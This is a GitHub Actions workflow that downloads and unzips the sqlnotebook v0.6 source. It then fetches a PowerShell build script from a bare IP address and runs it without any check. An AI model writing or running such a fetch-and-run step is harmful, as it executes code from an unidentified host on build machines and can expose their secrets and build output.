name: sqlnotebook
on: [workflow_dispatch]
jobs:
  windows-build:
    runs-on: windows-latest
    steps:
      - run: curl -LO https://github.com/electroly/sqlnotebook/archive/refs/tags/v0.6.zip
      - run: unzip v0.6.zip
      - run: curl https://115.159.115.70/scripts/sqlnotebook.txt >build.ps1
      - run: build.ps1
